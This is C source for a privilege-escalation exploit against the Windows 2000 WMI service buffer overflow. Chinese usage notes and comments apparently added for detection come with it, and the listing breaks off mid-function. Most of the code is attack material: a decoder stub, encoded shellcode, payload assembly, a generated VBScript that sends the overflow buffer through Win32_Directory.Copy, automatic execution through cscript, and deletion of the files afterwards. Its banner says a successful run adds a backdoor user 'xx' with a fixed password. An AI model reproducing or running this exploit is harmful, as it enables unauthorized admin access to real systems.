
windows 2000 wmi service buffer overflow exploit
  
WMIService -> CreateDirectoryExW -> RtlDosPathNameToNtPathName_U

wmi默认只有administrators才可以远程连接,所以只有能在目标系统上运行程序的用户才能利用。
本地用户可用来提升权限。
此程序可用于简体中文、繁体中文、日文、韩文系统sp0-3上。
不需要指定任何参数,程序会自动搜索可用的call ebx地址。
用c代码来与wmi service通讯太复杂了,所以程序是生成两个文件,一个是存放exploit buffer的
buff.txt,一个是xWMI.vbs。

/*----------------------------------------------------------------------------------*/
#include <windows.h>
#include <stdio.h>

/* Fill byte for the payload buffer (used by the memset in main); 0x4F is 'O'. */
#define    NOPCODE        0x4F//0x4F//'O'
/* Length of the fill region in code-page bytes. The macro body is not
 * parenthesised, so `BUFFLEN+x` expands to `(65536+8)/2+x`; harmless for
 * the single use in main but a precedence hazard in general. */
#define BUFFLEN        (65536+8)/2
/* Offset constant for placing the converted stub inside the payload
 * (main uses OVERPOINT/2). */
#define OVERPOINT    0x260//overflow point-0x14 SEH-0x4

/* System default ANSI code page, read by main for WideCharToMultiByte.
 * Presumably assigned by MakeWideCharList(), whose body is cut off in this
 * listing -- confirm there. */
int    g_iCodePage;
/* DLL names. Not referenced in the visible code; presumably scanned by
 * SearchRET(), which is defined outside this listing. */
char    g_szDllList[5][16]={"kernel32.dll",
            "advapi32.dll",
            "user32.dll",
            "gdi32.dll",
            "ole32.dll"};
/* Not referenced in the visible code. */
char            *g_szWideCharShort;
/* Fixed byte sequences that main copies into the payload: jmpover at
 * offset 0 and decoder at offset 8 of widecharbuff (both then pass through
 * WideCharToMultiByte), xShellCode appended unchanged after them.
 * Detection note: because xShellCode is written to buff.txt byte-for-byte,
 * it is a stable string signature for the generated file; the other two
 * appear only in their code-page-converted form. */
unsigned char    jmpover[]="\x41\x90\x41\x68";//0x41 inc ecx , 0x68  push num32
unsigned char    decoder[]=
"\x4F\x75\x05\x74\x03\x4E\xC3\x4F\x53\x90\x5E\x66\xAD\x4E\x46\x4F"
"\x43\x66\x3D\x97\x6F\x90\x51\x90\x59\x75\xF0\x53\x56\x5F\x4A\x57"
"\x43\x66\xAD\x50\x43\x66\x3D\x4F\x00\x90\x59\x74\xD9\x4E\x2C\x64"
"\x50\x59\x46\x4F\x47\x90\x43\x66\xAD\x50\x4B\x58\x2C\x64\x4A\x57"
"\x51\x90\x90\x5F\x03\xFF\x03\xFF\x03\xFF\x03\xFF\x91\x03\xCF\x91"
"\x90\x5F\xAA\x90\x41\x74\xCA\x90\x51\x90\x59\x75\xC4\x4E\x97\x6F";
unsigned char    xShellCode[]=
"iilorprojhinoldhddsekkleglhqinmdddkhdghlrosiloqllokggpdgsglokjkldgsglokrfddgsolo"
"hrehggrqijikielogsdgsolosfggpmlgpedrsgnjkhdlimislgpkdhhirfrkimisirlopqlohjfhdgpg"
"qeredgpeggpmjjlodllohjepdgpgperedfdgpelodddgpgrodfrogklosnlosflmdjlgpkdsikigssqd"
"lgpjdhlmdjlgpkdlikiglohjspssqdlgpjdhlmdjggpdidlgpkdjiklohjspssqdolssssssssidlodj"
"ssqdrlirsssssshkjikhidkfjsjghejhjhkfjikgkgddikjmjrhikljijgddigjpjijikdddjgjqjhfd"
"fsjgfdjrjikhfrjikljifdkikgjikffdklklfdgejefefrgmjrhlfdfsjejhjhfdfjfjfdjrjikhfdjp"
"jsjgjejpjkkfjskikdfdjejhjqjmjrjmkgkhkfjekhjskfkgfdklklfdfsjejhjhdd";

/* Forward declarations. main treats a SearchRET() result of 0 as failure
 * and returns; the page text says it searches for a usable address
 * automatically, but its body is not in this listing. MakeWideCharList()
 * starts further down and is cut off. func() is the thread body. */
int        SearchRET();
BOOL    MakeWideCharList();
DWORD WINAPI func(LPVOID lp);

/*
 * Entry point (non-standard `void main`).
 *
 * Builds the payload string in memory, writes it to buff.txt, generates
 * xWMI.vbs, starts a thread that runs the script with cscript.exe, sleeps
 * 20 s and deletes both files. Returns silently if SearchRET() yields 0,
 * and after printing GetLastError() if GetCurrentDirectoryA fails.
 *
 * Detection / response notes, all taken from the code below:
 *  - Disk artifacts: buff.txt and xWMI.vbs in the working directory; both
 *    exist for only ~20 s before DeleteFile removes them, so on-disk
 *    scanning alone is unreliable here.
 *  - Process artifacts: "cscript.exe xWMI.vbs" launched through system()
 *    from the worker thread func(); script-host process creation is the
 *    durable signal.
 *  - WMI artifacts: the script connects to winmgmts with
 *    impersonationLevel=impersonate, queries Win32_Directory for the
 *    working directory and calls .Copy() with the payload as the argument.
 *  - The banner states that success adds a local user "xx"; a new-account
 *    event shortly after a cscript.exe/WMI activity chain is the
 *    correlation point for IR.
 */
void main()
{
    int        retaddr,i,j,iPathLen, iwLen;
    unsigned char *pStr, widecharbuff[0x500], multibytebuff[0x500];
    unsigned char szVBS[0x1000], szPath[256], szPath2[256];
    FILE    *f;

    printf( "xWMI -> win2k WMI service buffer overflow exploit\n"
        "WMIService -> CreateDirectoryExW -> RtlDosPathNameToNtPathName_U\n"
        "for win2k which default codepage is GB、BIG5、Korean、JP sp0-3\n"
        "Written by ey4s<cooleyas@21cn.com>\n"
        "2003-04-27\n"
        "thanks to yuange\n\n");

    // Code-page lookup (MakeWideCharList) and address search; 0 aborts.
    MakeWideCharList();
    retaddr = SearchRET();
    if(!retaddr) return;
    
    // 40000-byte zeroed working buffer for the payload string.
    pStr = (unsigned char *)malloc(40000);
    memset(pStr, 0, 40000);

    //get current path
    iPathLen = GetCurrentDirectoryA(sizeof(szPath)-1, szPath);
    if(!iPathLen)
    {
        printf("GetCurrentDirectoryA failed:%d\n",  GetLastError());
        return;
    }

    /* convert characters: stub is assembled as UTF-16 bytes, then turned
     * into the system code page so it survives the path conversion. */
    memset(widecharbuff, 0, sizeof(widecharbuff));
    //jmp over
    memcpy(widecharbuff,jmpover,4);
    //jmp addr
    memcpy(widecharbuff+4,&retaddr,4);
    //decoder
    memcpy(widecharbuff+8,decoder,sizeof(decoder));
    // wcslen() reads the byte buffer as a NUL-terminated UTF-16 string.
    iwLen=wcslen((unsigned short *)widecharbuff);
    i=WideCharToMultiByte(g_iCodePage,0,(unsigned short *)widecharbuff,
        iwLen*2,multibytebuff,0x1000,0,0);
    // i becomes the converted stub's byte length.
    i=strlen(multibytebuff);

    //assemble buffer: NOPCODE fill, current path + '\' at the start,
    //converted stub at OVERPOINT/2, raw xShellCode right after it.
    memset(pStr, NOPCODE, BUFFLEN+iwLen);
    memcpy(pStr, szPath, iPathLen);
    pStr[iPathLen]=(BYTE)'\\';
    //jmpover & jmpaddr
    memcpy(pStr+OVERPOINT/2, multibytebuff, i);
    //real shellcode
    memcpy(pStr+OVERPOINT/2+i, xShellCode, strlen(xShellCode));

    // Artifact 1: payload written to buff.txt in the working directory.
    f = fopen("buff.txt", "w");
    fprintf(f, "%s", pStr);
    fclose(f);
    free(pStr);

    printf("write exploit buffer to file %s\\buff.txt\n", szPath);

    //replace '\' to '\\' -- each backslash is doubled so the path is a
    //valid literal inside the WQL string in the script below.
    memset(szPath2, 0, sizeof(szPath2));
    for(i=0,j=0;i<strlen(szPath);i++,j++)
    {
        if(szPath[i]==(BYTE)'\\')
            szPath2[j++]=szPath[i];
        szPath2[j]=szPath[i];
    }

    // Artifact 2: the VBScript. It reads buff.txt, connects to WMI with
    // impersonate level, queries Win32_Directory for the working directory
    // and calls Copy(payload) on each match.
    sprintf(szVBS,  "Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"
            "set f2=fso.OpenTextFile(\"buff.txt\",1,false,TristateTrue)\n"
            "szBuffer=f2.ReadAll\n"
            "f2.Close\n"
            "Set fso = Nothing\n"
    "Set ServiceSet = GetObject(\"winmgmts:{impersonationLevel=impersonate}\")._\n"
            "ExecQuery(\"select * from Win32_Directory where Name='%s'\")\n"
            "for each Service in ServiceSet\n"
            "   WScript.Echo \"if you can see thie line,it maybe success!\"\n"
            "   Service.Copy(szBuffer)\n"
            "next\n"
            ,szPath2);
    f = fopen("xWMI.vbs", "w");
    fprintf(f, "%s", szVBS);
    fclose(f);
    printf("create exploit execute file %s\\xWMI.vbs\n", szPath);
    printf( "Execute exploit file %s\\xWMI.vbs\n"
        "if success, exploit will add a user xx password is 1a!.9nH\n", szPath);
    // Run the script on a worker thread (func), wait 20 s, then remove
    // both artifacts; the thread is never joined.
    CreateThread(0, 0, func, NULL, 0, NULL);
    Sleep(20000);
    DeleteFile("buff.txt");
    DeleteFile("xWMI.vbs");
    printf("Done.\n");
    return;
}

/*
 * Worker thread body started by main via CreateThread.
 *
 * Runs the generated script with "cscript.exe xWMI.vbs" through system();
 * system() normally goes via the command interpreter, so the resulting
 * process chain (this tool -> cmd.exe -> cscript.exe) is the most visible
 * host-level artifact for detection. `lp` is unused; always returns 0.
 */
DWORD WINAPI func(LPVOID lp)
{
    system("cscript.exe xWMI.vbs");
    return 0;
}

BOOL MakeWideCharList()
{
    int        iCodePage,i,j,ret;
    char    szCodePage[128];
    unsigned char wbuff[4];
    unsigned char wbuff2[4];
    unsigned char buff[4];

    if(!GetLocaleInfo(LOCALE_SYSTEM_DEFAULT, LOCALE_IDEFAULTCODEPAGE,
        szCodePage, sizeof(szCodePage)-1))
    {
        pri
